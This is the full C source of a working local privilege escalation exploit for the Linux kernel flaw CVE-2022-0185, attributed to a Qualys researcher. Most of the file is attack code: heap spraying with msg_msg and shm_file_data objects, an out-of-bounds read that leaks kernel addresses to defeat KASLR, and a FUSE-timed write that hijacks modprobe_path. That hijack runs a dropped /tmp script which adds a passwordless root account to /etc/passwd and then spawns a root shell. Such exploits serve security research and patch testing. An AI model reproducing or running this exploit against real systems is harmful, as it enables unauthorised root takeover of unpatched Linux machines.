/*
 * LPE N-day Exploit for CVE-2022-0185: Linux kernel Integer underflow
 * gcc exploit.c -o exploit -lpthread
 * gcc hello.c -o hello -std=gnu99 `pkg-config fuse --cflags --libs`
 * Author: Alejandro Guerrero <aguerrero@qualys.com>
 * Copyright (C) 2022 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */

/*

Note(s):

- This exploit has been tested in an Ubuntu 21.04 Hirsute with kernel 5.11.0
- This exploit relies on a specific heap situation, so you might need to run the exploit multiple times until that condition is met

*/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <pthread.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#include <sys/errno.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/shm.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <linux/futex.h>
#include <sys/mman.h>
#include <ctype.h>

/* configurable options */

#define DEBUG 0

#define FUSE_HELLO "./hello" // FUSE hello.c program path ("hello" on same directory!)
#define FUSE_ROOT_PATH "/tmp/fuse/" // FUSE mountpoint path

#define MODPROBE_PATH_ADDR 0xffffffff82c6c240 // address (offset) for modprobe_path on your target kernel image
#define INIT_IPC_NS_ADDR 0xffffffff82e23300 // address (offset) for init_ipc_ns on your target kernel image

#define DUMMY_MODPROBE_TRIGGER "/tmp/dummy" // dummy script to force a call to call_modprobe()
#define CALLBACK_ROOT_SCRIPT "/tmp/x" // path to be placed at modprobe_path

#define FIFO_FILE "/tmp/flg_fifo" // FIFO file to communicate with FUSE hello.c child
#define FIFO_FILE_2 "/tmp/flg_fifo_2" // FIFO file to communicate with FUSE hello.c child

/* end configurable options */

/* heap spraying options */

#define SPRAY_N_DEBUGFS 0x20 // number of debugfs allocations
#define L_SPRAY_N 0x7 // number of msg_msg structures to spray the heap with (leak phase)
#define SPRAY_N 0x8 // number of msg_msg structures to spray the heap with (write primitive phase)
#define SPRAY_SHM 0x96 // number of shm_file_data structures to spray with the kmalloc-32 cache

/* end heap spraying options */

/* size-related options */

#define MAX_SZ 4096*3 // just a sample value, to allocate for our payloads
#define PAGE_SIZE 0x1000 // PAGE_SIZE
#define ITER_N 0xfff / 3 // number of iterations to reach underflow (three chars per iteration are written) so 0xfff / 3
#define OVERFLOW_BLOCK_SZ 0x80 // higher overflows give problems, let's keep sending blocks of 0x80 bytes each
#define OBJECT_SIZE 0x1018 // object size for msg_msg messages to have a kmalloc-4096 initial message, and a kmalloc-32 segment object
#define OV_PAYLOAD_SZ PAGE_SIZE // size of the payload to overwrite modprobe_path through FUSE handler
#define MODPROBE_OFF 0xfc8 // offset until the start of modprobe_path on the overwrite payload
#define MSG_MSG_HDR_SZ 0x30 // header size on msg_msg structures
#define PAGE_OFF_INT 0xff0 // starting of page off to send to msgsnd()

/* end size-related options */

/* syscall-related flags / options */

#define SYS_fsopen __NR_fsopen
#define SYS_fsconfig __NR_fsconfig
#define SYS_fsmount __NR_fsmount

#define FSOPEN_CLOEXEC 0x00000001

#define FSMOUNT_CLOEXEC 0x00000001

enum fsconfig_command {
	FSCONFIG_SET_FLAG= 0,	/* Set parameter, supplying no value */
	FSCONFIG_SET_STRING= 1,	/* Set parameter, supplying a string value */
	FSCONFIG_SET_BINARY= 2,	/* Set parameter, supplying a binary blob value */
	FSCONFIG_SET_PATH= 3,	/* Set parameter, supplying an object by path */
	FSCONFIG_SET_PATH_EMPTY= 4,	/* Set parameter, supplying an object by (empty) path */
	FSCONFIG_SET_FD= 5,	/* Set parameter, supplying an object by fd */
	FSCONFIG_CMD_CREATE= 6,	/* Invoke superblock creation */
	FSCONFIG_CMD_RECONFIGURE = 7,	/* Invoke superblock reconfiguration */
};

/* end syscall-related flags / options */

#define DEFAULT_KERNEL_BASE 0xffffffff81000000 // default base address for target kernel image
#define LEAKED_OFF INIT_IPC_NS_ADDR - DEFAULT_KERNEL_BASE // offset from KASLR base to leaked address
#define DEBUGFS_F "debugfs" // just the string to pass fsopen()

#ifndef HEXDUMP_COLS
	#define HEXDUMP_COLS 16
#endif

/* we need this struct to send-receive data/arguments from/to msg */
struct msgbuf_t {
    long mtype;       /* message type, must be > 0 */
    char mtext[0];    /* message data */
};

unsigned long kaslr_base = 0;
unsigned long leaked = 0;
unsigned long modprobe_path = MODPROBE_PATH_ADDR;

int release_hdlr = 0;
int leak_succeed = 0;

int fuse_pid = 0;
int fuse_pipefd[2] = { 0 };

char *fuse_file[] = 
	{ FUSE_ROOT_PATH"a", FUSE_ROOT_PATH"b", FUSE_ROOT_PATH"c",
	FUSE_ROOT_PATH"d", FUSE_ROOT_PATH"e", FUSE_ROOT_PATH"f",
	FUSE_ROOT_PATH"g", FUSE_ROOT_PATH"h", NULL };

/*

flags:
 - FSOPEN_CLOEXEC
 - 0

*/

int fsopen(char *fsname, unsigned int flags) {
	int fd = -1;
	fd = syscall(SYS_fsopen, fsname, flags);
	return fd;
}

/*

cmd:
 - FSCONFIG_SET_FLAG
 - FSCONFIG_SET_STRING
 - FSCONFIG_CMD_CREATE
 - FSCONFIG_CMD_RECONFIGURE
 
*/

int fsconfig(int fd, unsigned int cmd, const char *key, const char *value, int aux) {
	int ret = -1;
	ret = syscall(SYS_fsconfig, fd, cmd, key, value, aux);
	return ret;
}

/*

flags:
 - FSMOUNT_CLOEXEC
 - 0

mount_attrs:
 - MS_NODEV
 - MS_RELATIME

*/

int fsmount(int fd, unsigned int flags, unsigned int mount_attrs) {
	int ret = -1;
	ret = syscall(SYS_fsmount, fd, flags, mount_attrs);
	return ret;
}

/*

flags:
 - O_CLOEXEC
 - O_NONBLOCK

*/

/* show error and exit */
void bye(const char *msg) {
	if(msg != NULL)
		puts(msg);
	exit(1);
	/* should never be reached */
	return;
}

/* just an hexdump utility */
void hexdump(void *mem, unsigned int len) {
        unsigned int i = 0, j = 0;
        putchar('\n');
        for(i = 0; i < len + ((len % HEXDUMP_COLS) ? (HEXDUMP_COLS - len % HEXDUMP_COLS) : 0); i++) {
                if(i % HEXDUMP_COLS == 0)
                        printf("	0x%06x: ", i);
                if(i < len)
                        printf("%02x ", 0xFF & ((char*)mem)[i]);
                else
                        printf("   ");
                if(i % HEXDUMP_COLS == (HEXDUMP_COLS - 1)) {
                        for(j = i - (HEXDUMP_COLS - 1); j <= i; j++) {
                                if(j >= len)
                                        putchar(' ');
                                else if(isprint(((char*)mem)[j]))
                                        putchar(0xFF & ((char*)mem)[j]);        
                                else
                                        putchar('.');
                        }
                        putchar('\n');
                }
        }
        putchar('\n');
        return;
}


/* set up requirements for modprobe_path overwrite to give us LPE */
void drop_callback_scripts(void) {
	system("bash -c \"echo -e '\xff\xff\xff\xff\xff\xff' > " DUMMY_MODPROBE_TRIGGER "\"");
	system("chmod +x " DUMMY_MODPROBE_TRIGGER);
	system("echo '#!/bin/bash' > " CALLBACK_ROOT_SCRIPT);
	system("echo 'echo \"r00t::0:0:r00t:/:/bin/sh\" >> /etc/passwd' >> " CALLBACK_ROOT_SCRIPT);
	system("chmod +x " CALLBACK_ROOT_SCRIPT);
	return;
}

/* calculate addresses once we have a leak */
void calculate_off(void) {

	off_t off = 0;
	unsigned long lk_off = 0;
	
	lk_off = LEAKED_OFF;
	kaslr_base = leaked - lk_off;
	
	off = kaslr_base - DEFAULT_KERNEL_BASE;
	modprobe_path += off;
	
	return;
}

/* assign to a CPU core */
void assign_to_core(int core_id) {
	cpu_set_t mask;
	CPU_ZERO(&mask);
	CPU_SET(core_id, &mask);
	if(sched_setaffinity(getpid(), sizeof(mask), &mask) < 0)
		bye("[-] Error at sched_setaffinity()");
	return;
}

/* execute dummy script with unknown magic numbers to trigger modprobe_path execution */
void trigger_modprobe_path(void) {
	system(DUMMY_MODPROBE_TRIGGER " 2>/dev/null");
	return;
}

/* trigger out-of-bounds read to leak init_ipc_ns */
void trigger_oob_read(int *ac, size_t s_iter) {
	int r = 0;
	char *data = NULL;
	uint64_t *data_l = NULL;
	size_t size = 0;
	
	size = 0x400 * sizeof(uint64_t);
	
	data = calloc(size, sizeof(char));
	if(data == NULL)
		bye("[-] Error at calloc()");
	data_l = (uint64_t *)data;
	
	for(int i = 0 ; i < s_iter ; i++) {
		memset(data, '\0', size);
		r = msgrcv(ac[i], data, size, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);
		if(r < 0)
			continue;
		#if DEBUG
		
		//hexdump((void *)data, size);
		
		int xp = 2;
		while(xp < size) {
			if((char)data[xp] != 0x00 && ((char)data[xp] < 32 || (char)data[xp] > 127)) {
				puts("[+] Leaked data: ");
				hexdump((void *)data, size);
				break;
			}
			xp++;
		}
		
		#endif
		
		for(int x = 0 ; x < 0x400 ; x++) {
			if(!(((uint64_t)INIT_IPC_NS_ADDR & 0x0000000000000fff) ^ ((uint64_t)data_l[x] & 0xfff))) {
				leaked = data_l[x];
				printf("[+] Leaked: init_ipc_ns @ 0x%lx\n", leaked);
				leak_succeed = 1;
				return;
			}
		}
	}
	return;
}

/* craft payload to overwrite modprobe_path */
char *craft_ov_payload(void) {
	char *ov_payload = NULL;
	
	ov_payload = calloc(OV_PAYLOAD_SZ, sizeof(char));
	if(ov_payload == NULL)
		bye("[-] Error at calloc()");
	
	/* pad until modprobe_path location */
	memset(ov_payload, 0x41, MODPROBE_OFF);
	/* make sure it is properly null-terminated */
	memcpy(ov_payload + MODPROBE_OFF, CALLBACK_ROOT_SCRIPT, strlen(CALLBACK_ROOT_SCRIPT)+1);
	
	return ov_payload;
}

/* prepare corrupt payload to get read primitive through OOB write */
char *craft_payload(int end) {
	char *ptr = NULL;
	/* offset to msg_msg.m_ts */
	off_t o = 0x18 - end;

	ptr = calloc(MAX_SZ, sizeof(char));
	if(ptr == NULL)
		bye("[-] Error at calloc()");
	
	memset(ptr,  0x41, o);
	
	/* replace msg_msg->m_ts with larger value to trigger OOB read */
	ptr[o] = 0xa0;
	ptr[o+1] = 0x10;
	ptr[o+3] = 0x00;
	return ptr;
}

/* prepare corrupt payload to get write primitive through OOB write */
char *craft_payload_corrupt(int end, uint64_t modprobe_addr) {

	char *ptr = NULL;
	/* offset to msg_msg.next */
	off_t o = (0x18 + 0x8) - end;
	uint64_t *ptr_l = NULL;

	ptr = calloc(MAX_SZ, sizeof(char));
	if(ptr == NULL)
		bye("[-] Error at calloc()");

	ptr_l = (uint64_t *)(((char *)(ptr))+o);
	memset(ptr,  0x41, o);
	
	/*
	   the first entry msg_msg.next should be skipped
	   so we make msg_msg.next be &modprobe_path - 8
	   so that our data is written right at modprobe_path
	   beggining
	*/
	ptr_l[0] = (uint64_t)modprobe_addr - 8;
	ptr_l[1] = (uint64_t)0;
	
	return ptr;
}

/* just a function to send data to legacy_parse_param() through fsconfig() */
void send_oob_data(int fd, char *data) {
	size_t size = 0;
	
	size = strlen(data);
	
	if(size <= OVERFLOW_BLOCK_SZ) {
		fsconfig(fd, FSCONFIG_SET_STRING, ".", data, 0);
		return;
	}

	return;
}

/* fill the ctx->legacy_data buffer to increase size and trigger the underflow */
void trigger_integer_underflow(int fd) {
	for(int i = 0 ; i < ITER_N ; i++)
		fsconfig(fd, FSCONFIG_SET_STRING, ".", "", 0);
	return;
}

/* pause function for debugging */
void pause_x(void) {
	char c = 0;
	puts("[i] Press enter to continue...");
	read(0, &c, 1);
	return;
}

/* allocate msg_msg structures within a thread as they are going to get blocked due to FUSE */
void spray_threaded_msg_msg(void *page) {
	int r_x = 0;
	int r = 0;
	uint64_t *page_l = NULL;
	
	page_l = (uint64_t *)page;
	
	page_l[PAGE_OFF_INT / 8] = 1; // msg_msg.m_type = 1
	
	r_x = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
	if(r_x < 0)
		bye("[-] Error at msgget()");
		
	r = msgsnd(r_x, page + PAGE_SIZE - 0x10, OBJECT_SIZE, 0);
	if(r < 0) {
		printf("[-] Err.: %s\n", strerror(errno));
		bye("[-] Error at msgsnd()");
	}
	return;
}

/* spray with shm_file_data structures on kmalloc-32 cache */
void spray_shm_file_data(size_t s_iter) {
	int r = 0;
	void *p = NULL;
	for(int i = 0 ; i < s_iter ; i++) {
		r = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
		if(r < 0)
			bye("[-] Error at shmget()");

		p = shmat(r, NULL, SHM_RDONLY);
		if((long)p < 0)
			bye("[-] Error at shmat()");
	}
	return;
}

/* allocate a msgbuf_t struct to communicate with msg */
char *msgbuf_alloc(size_t size, long m_type, size_t *sz) {
	char *buf = NULL;
	size_t r_sz = 0;
	if(sz)
		*sz = 0;
	struct msgbuf_t *strct_buf = NULL;
	r_sz = size - MSG_MSG_HDR_SZ;
	buf = calloc(sizeof(struct msgbuf_t) + size, sizeof(char));
	if(buf == NULL)
		bye("[-] Error at calloc()");
	strct_buf = (struct msgbuf_t *)buf;
	strct_buf->mtype = m_type;
	if(sz)
		*sz = r_sz;
	return buf;
}

/* spray with msg_msg structures on kmalloc-4096 cache */
void spray_msg_msg(int *ac, size_t s_iter) {
	int r = 0;
	size_t size = 0;
	char *msg_buf_p = NULL;
	struct msgbuf_t *msg_buf_s = NULL;

	msg_buf_p = msgbuf_alloc(OBJECT_SIZE, 1, &size);
	msg_buf_s = (struct msgbuf_t *)msg_buf_p;

	memset(msg_buf_s->mtext, 0x41, size);

	for(int i = 0 ; i < s_iter ; i++) {
		ac[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
		if(ac[i] < 0)
			bye("[-] Error at msgget()");
	}

	for(int i = 0 ; i < s_iter ; i++) {
		r = msgsnd(ac[i], msg_buf_p, size, 0);
		if(r < 0)
			bye("[-] Error at msgget()");
	}
	return;
}

/* initialize FUSE hello.c child process */
void fuse_init(void) {
	int r = 0;
	pipe(fuse_pipefd);
	r = mkdir(FUSE_ROOT_PATH, S_IRWXU);
	if(r != 0)
		puts("[-] Error at mkdir()");
		
	puts("[.] Initializing FUSE hello child...");
	int pid = fork();
	if(pid == 0) {
		close(fuse_pipefd[1]);
		r = dup2(fuse_pipefd[0], 0);
		if(r != 0)
			bye("[-] Error at dup2()");
		char *argv[] = { FUSE_HELLO, "-o", "sync_read", "-f", "-s", FUSE_ROOT_PATH, NULL };
		char *envp[] = { NULL };
		execve(FUSE_HELLO, argv, envp);
		/* should never be reached */
		return;	
	}
	
	close(fuse_pipefd[0]);
	
	return;
}

/* stop FUSE hello.c child process */
void fuse_stop(void) {
	int r = 0;
	close(fuse_pipefd[1]);
	r = kill(fuse_pid, SIGTERM);
	if(r != 0)
		bye("[-] Error at kill()");
	return;
}

/* create a FIFO file to communicate with FUSE hello.c child process */
void create_fifo(void) {
	mkfifo(FIFO_FILE, 0666);
	mkfifo(FIFO_FILE_2, 0666);
	return;
}

/* Wait until receiving data from FUSE hello.c child process through a FIFO file*/
int wait_till_fifo(void) {
	int lets_go = 0;
	int fd = 0;
	int r = 0;
	fd = open(FIFO_FILE, O_RDONLY);
	if(fd < 0)
		puts("[-] Error at open()");
	r = read(fd, &lets_go, sizeof(int));
	if(r < 0)
		puts("[-] Error at read()");
	close(fd);
	return lets_go;
}

/* Send data to the FUSE hello.c child process through a FIFO file */
void send_fifo(void) {
	int lets_go = 1;
	int fd = 0;
	int r = 0;
	fd = open(FIFO_FILE_2, O_WRONLY);
	if(fd < 0)
		puts("[-] Error at open()");
	r = write(fd, &lets_go, sizeof(int));
	if(r < 0)
		puts("[-] Error at write()");
	close(fd);
	return;
}

int main(void) {
	
	int tr = 0;
	int fd = 0;
	int rd = 0;
	void *mmap_r = 0;
	int end = 0;
	int ns_fd = 0;
	int is_success = 0;
	int ffuse_fd = 0;
	int r = 0;
	int rr = 0;
	int pid = 0;
	int ov_f = 0;
	int fifo_resp = 0;
	int r_ac = 0;
	int pipefd[2] = { 0 };
	size_t a_size = 0;
	pthread_t tid = 0;
	char *payload = NULL;
	char *corrupt = NULL;
	char *ov_payload = NULL;
	char *d_rcv = NULL;
	char *msg_buf_p = NULL;
	void *m_addr = NULL;
	long *m_type_set = NULL;
	struct msgbuf_t *msg_buf_s = NULL;
	void *faulting_pages[SPRAY_N+1] = { 0 };
	int ac[L_SPRAY_N+1] = { 0 };
	
	puts("[i] CVE-2022-0185: Linux kernel integer underflow to LPE Exploit");

	drop_callback_scripts();
	
	assign_to_core(0);

	/*
	   If we ran the exploit previously, this might still be mounted,
	   so lets unmount it first so we can use it without problems later.
	*/
	
	system("fusermount -u /tmp/fuse 2>/dev/null");
	
	/*
	   To avoid problems because of entering on
	   the new namespace, we will move the final
	   code to pop a shell to a previously fork()'ed
	   process
	*/
	
	pipe(pipefd);
	
	pid = fork();
	if(pid == 0) {
		close(pipefd[1]);	
			
		r = read(pipefd[0], &is_success, sizeof(int));
		if(r < 0)
			bye("[-] Exploit failed!");
		
		if(is_success) {
		
			puts("[.] Forcing modprobe_path to execute our arbitrary script...");
			trigger_modprobe_path();

			puts("[.] Popping a root shell...");
			system("su r00t");

		} else
			puts("[-] Exploit failed");
		
		close(pipefd[0]);
		exit(EXIT_SUCCESS);
	}
	
	close(pipefd[0]);

	/*
	   Initialize the FUSE hello.c child process
	*/
	
	fuse_init();
	
	/*
	   We need CAP_SYS_ADMIN capability, so lets create a new
	   namespace where we have it
	*/
	puts("[*] Calling unshare() to own CAP_SYS_ADMIN capability on new namespace...");
	unshare(CLONE_NEWNS | CLONE_NEWUSER);
	
	
	/*
	   This should work to fill holes on already freed
	   kmalloc-4096 cache objects.
	   
	   We need to call fsconfig() as ctx->legacy_data is
	   initialized and allocated when legacy_parse_param()
	   is called.
	*/
	
	puts("[.] Spraying with legacy_parse_param() objects...");
	for(int x = 0 ; x < SPRAY_N_DEBUGFS ; x++) {
		fd = fsopen(DEBUGFS_F, 0);
		fsconfig(fd, FSCONFIG_SET_STRING, ".", "", 0);
	}

	puts("[*] Spraying with shm_file_data structs...");
	spray_shm_file_data(SPRAY_SHM);

	puts("[*] Spraying with msg_msg structs...");	
	spray_msg_msg((int *)&ac, L_SPRAY_N);
	
	#if DEBUG
	
	puts("[i] msg descriptors: ");
	for(int i = 0 ; i < L_SPRAY_N ; i++) {
		printf("\t[i] ac[%d] = %d\n", i, ac[i]);
	}
	
	#endif
	
	d_rcv = calloc(OBJECT_SIZE, sizeof(char));
	if(d_rcv == NULL)
		bye("[-] Error at calloc()");

	rr = msgrcv(ac[0], d_rcv, OBJECT_SIZE, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);
	if(rr < 0)
		bye("[-] Error at msgrcv()");

	if(d_rcv)
		free(d_rcv);
	d_rcv = NULL;
    	
    	/*
    	   We finally open debugfs, and the chunk returned
    	   now will be the one from which we will overflow
    	   next one. Hopefully next object is one of the
    	   sprayed msg_msg structures.
    	*/
	puts("[.] Opening debugfs...");
	fd = fsopen(DEBUGFS_F, 0);
	if(fd < 0) {
		printf("[-] Err.: %s\n", strerror(errno));
		bye("[-] Error at fsopen()");
	}
	
	/*
	   We need to fill the whole buffer to make size
	   trigger the underflow: 
	   
	   if (len > PAGE_SIZE - 2 - size)
		return invalf(fc, "VFS: Legacy: Cumulative options too large");
	
	   Where size is ctx->data_size. So we need to make the substraction
	   negative in order to be able to keep sending data out-of-bounds,
	   due to len being always less than the negative substraction, eg.:
	   -1 (0xffffffffffffffff).
	   
	*/
	puts("[.] Filling ctx->legacy_data to trigger integer underflow...");
	trigger_integer_underflow(fd);
	
	end = 2;
	
	/*
	
	   To craft a read primitive, we will overflow the next msg_msg
	   structure in such way the size is larger than it should be,
	   so it will trigger an out-of-bounds read in the kmalloc-32
	   cache, which is where the segment corresponding this msg_msg
	   struct is located.
	   
	   As we already sprayed kmalloc-32 with shm_file_data structures
	   this will likely end up in the ability to calculate KASLR base
	   through init_ipc_ns.
	   
	       struct msg_msg {
                  struct list_head m_list;
                  long m_type;
                  size_t m_ts;		
                  struct msg_msgseg *next;
                  void *security;
               };
           
           Fortunately, even if we rely on strings, both of the pointers
           at m_list are not used when achieving this, so we can leave them
           as 0x4141414141414141.
           
           Also, m_type can be left as a value like the above. Finally, and
           really important, I initially thought of a partial overwrite on
           msg_msg.m_ts to prevent huge values resulting on crashes, but
           it ended up being used as a maximum value, and the actual number
           of bytes copied are the ones specified by the userland caller :-)
           
           The above mentioned is really important for the second exploitation
           phase, in which we need to overwrite the msg_msg.next pointer, thus
           size would be filled completely, making it a huge value.
           
	*/
	
	puts("[.] Crafting read primitive payload...");
	payload = craft_payload(end);
	
	#if DEBUG
	pause_x();
	#endif
	
	/*
	   The overflow is really clean, because not only we already triggered
	   an integer underflow that let us keep overwriting out-of-bounds, but
	   also as a result of the integer underflow, the index where to copy data
	   now points to the beggining of the next object, so we just need to send
	   more data to overwrite msg_msg headers :-)
	*/
	
	puts("[.] Triggering SLAB out-of-bounds (OOB) write...");
	send_oob_data(fd, payload);

	/*
	   If any of the sprayed msg_msg chunks has been overwritten by our overflow,
	   then requesting reads over these with msgrcv() and with a larger value than
	   their initial content,should give us out-of-bounds data, and if so, hopefully
	   containing the init_ipc_ns address.
	   
	   Due to the freelist randomization we might need to execute the exploit multiple
	   times until one of those sprayed objects is placed after our overflowing heap
	   chunk. 
	*/
	
	puts("[.] Achieving leak primitive...");
	trigger_oob_read((int *)&ac, L_SPRAY_N);
	
	if(!leak_succeed) {
		kill(fuse_pid, SIGTERM);
		sleep(1);
		bye("[-] Leak primitive failed!");
	}

	/* recalculate offsets now that we have a leak */
	calculate_off();
	
	printf("[+] Leaked: KASLR base @ 0x%lx\n", kaslr_base);
	printf("[+] Leaked: modprobe_path @ 0x%lx\n", modprobe_path);
	
	#if DEBUG
	pause_x();
	#endif
	
	sleep(2);
	
	/* time to prepare ourselves for the write primitive! */
	
	puts("[.] Preparing write-what-where data...");
	corrupt = craft_payload_corrupt(end, modprobe_path);
	ov_payload = craft_ov_payload();
	
	/*
	   We send our ov_payload to the FUSE hello program
	   so that it is copied to the handled pages from
	   the handler itself
	*/
	puts("[.] Sending overwrite payload to FUSE hello child...");
	rd = write(fuse_pipefd[1], ov_payload, OV_PAYLOAD_SZ);
	if(rd <= 0)
		bye("[-] Error at write()");
	sleep(4);

	/*

	*/
	
	puts("[.] Preparing FUSE file-backed mmapped pages...");
	
	unsigned long initial_page = 0x3fd4f000;
	
	for (int i = 1 ; i < SPRAY_N ; i++) {
		#if DEBUG
		printf("[i] FUSE registering (idx = %d)\n", i);
		#endif
		faulting_pages[i] = mmap((void *)(initial_page + (i*(PAGE_SIZE*4))), PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
		if(faulting_pages[i] == (void *)MAP_FAILED)
			bye("[-] Error at mmap()");
		if(faulting_pages[i] != (void *)(initial_page + (i*(PAGE_SIZE*4))))
			bye("[-] Address mismatch!");
		#if DEBUG
		printf("\t[i] initial non-file-backed page: 0x%lx\n", faulting_pages[i]);
		#endif
		m_addr = faulting_pages[i] + PAGE_SIZE;
		ffuse_fd = open(fuse_file[i], O_RDWR);
		if(ffuse_fd < 0)
			bye("[-] Error at open()");
		mmap_r = mmap(m_addr, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED, ffuse_fd, 0);
		if(mmap_r == (void *)MAP_FAILED)
			bye("[-] Error at mmap()");
		if(mmap_r != m_addr)
			bye("[-] Address mismatch");
		#if DEBUG
		printf("\t[i] FUSE file-backed page: 0x%lx\n", mmap_r);
		#endif
		m_addr = m_addr + PAGE_SIZE;
		mmap_r = mmap(m_addr, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
		if(mmap_r == (void *)MAP_FAILED)
			bye("[-] Error at mmap()");
		if(mmap_r != m_addr)
			bye("[-] Address mismatch");
		#if DEBUG
		printf("\t[i] final non-file-backed page: 0x%lx\n", m_addr);
		#endif
	}

    	/*
    	   We already have a leak! The problem now is that as far as I know
    	   we cannot return back, so we need to massage the heap again to
    	   reach the wanted condition: overflowing chunk is before a clean
    	   msg_msg struct.
    	   
    	   Also, another condition now is that the msg_msg clean object
    	   overwritten is one of those where we sent our FUSE-file mmapped
    	   page.
    	   
    	*/    
    	
    	puts("[.] Spraying with legacy_parse_param() objects...");
	for(int x = 0 ; x < SPRAY_N_DEBUGFS ; x++) {
		fd = fsopen(DEBUGFS_F, 0);
		fsconfig(fd, FSCONFIG_SET_STRING, ".", "", 0);
	}

	puts("[*] Spraying with msg_msg structs...");
	
	r_ac = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
	if(r_ac < 0)
		bye("[-] Error at msgget()");

	msg_buf_p = msgbuf_alloc(OBJECT_SIZE, 1, &a_size);
	msg_buf_s = (struct msgbuf_t *)msg_buf_p;

	memset(msg_buf_s->mtext, 0x41, a_size);
	
	rr = msgsnd(r_ac, msg_buf_p, a_size, 0);
	if(rr < 0)
		bye("[-] Error at msgsnd()");
	
	#if DEBUG
	puts("[.] Launching threads...");
	#endif
	
	for (int i = 1 ; i < SPRAY_N ; i++) {
		tr = pthread_create(&tid, NULL, (void *)spray_threaded_msg_msg, (void *)(faulting_pages[i]));
		if(tr != 0)
			bye("[-] Error at pthread_create()");
	}
	
	d_rcv = calloc(OBJECT_SIZE, sizeof(char));
	if(d_rcv == NULL)
		bye("[-] Error at calloc()");

	rr = msgrcv(r_ac, d_rcv, OBJECT_SIZE, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);
	if(rr < 0)
		bye("[-] Error at msgrcv()");
		
 
	/*
	   Again, this will be the chunk where to overflow from,
	   and we follow the same steps as before, the only change
	   here is that this time in the overflow we are going to
	   overwrite the segment (next) with modprobe_path - 0x8
	   as part of the overflow.
	   
	   Segments are a NULL pointer (another "next" member of a linked
	   list) followed by the data they actually store.
	   
	   We point it to modprobe_path - 0x8 so that the "next" coincides
	   with a NULL, thus making it valid and avoiding problems with
	   the linked list.
	   
	*/
	
	puts("[.] Opening debugfs...");
	fd = fsopen(DEBUGFS_F, 0);
	if(fd < 0) {
		printf("[-] Err.: %s\n", strerror(errno));
		bye("[-] Error at fsopen()");
	}
	
	puts("[.] Filling ctx->legacy_data to trigger integer underflow...");
	trigger_integer_underflow(fd);

	/*
	   Communicate with a FIFO file to receive when the first thread
	   reached the FUSE handler, so we can trigger the overflow.
	*/
	
	create_fifo();
	fifo_resp = wait_till_fifo();
	if(!fifo_resp)
		bye("[-] Unknown fifo response...");

	/*
	   Important sleep to let all the threads be blocked (one will be running
	   the handler, and the rest will be queued until we release the first one).
	*/
	
	sleep(3);
		
	puts("[.] Triggering SLAB out-of-bounds (OOB) write...");
	send_oob_data(fd, corrupt);
	
	sleep(3);

	/*
	   All right! If all went good, the next pointer of one of those
	   threads should be pointing to modprobe_path - 0x8, thus releasing
	   them will make the thread continue the execution.
	   
		msg = alloc_msg(len);
		if (msg == NULL)
			return ERR_PTR(-ENOMEM);

		alen = min(len, DATALEN_MSG);
		if (copy_from_user(msg + 1, src, alen))
			goto out_err;

		for (seg = msg->next; seg != NULL; seg = seg->next) {
			len -= alen;
			src = (char __user *)src + alen;
			alen = min(len, DATALEN_SEG);
			if (copy_from_user(seg + 1, src, alen))
				goto out_err;
		}
	
	   As you can see we could hang the thread through the first copy_from_user()
	   call, but the msg->next was overwritten by us while the thread was suspended
	   so when letting it continue as we released the FUSE handler, the
	   corrupted msg->next will be loaded into seg, and then our arbitrary data
	   will be written there!
	   
	   Which means modprobe_path will be overwritten with our custom value, so
	   we execute a file whose magic numbers are unknown for the kernel, forcing
	   a call to call_modprobe(), which will use the usermode helper /sbin/modprobe
	   to handle the situation. As modprobe_path, (where the path for the usermode
	   helper is stored) has been hijacked, our arbitrary path will be executed as
	   root, so placing "/tmp/x" will trigger the execution of our script as root,
	   thus achieving finally LPE as root!
	   
	*/
	
	puts("[.] Releasing FUSE-hanged copy_from_user() call...");
	
	send_fifo();
	sleep(6);
	
	puts("[+] modprobe_path overwritten!");
	
	if(payload)
		free(payload);
	payload = NULL;
	
	if(corrupt)
		free(corrupt);
	corrupt = NULL;
            
        /*
           We are still on the new namespace, so trying to root
           from here will give problems, communicate with the child
           process we created before entering the namespace with a pipe
           letting it know that the exploitation succeed and it is time to
           trigger modprobe_path execution, and pop a root shell!
        */
        
	is_success = 1;
	r = write(pipefd[1], &is_success, sizeof(int));
	if(r < 0)
		return 1;

	close(pipefd[1]);
	
	wait(NULL);
	sleep(1);

	return 0;
}

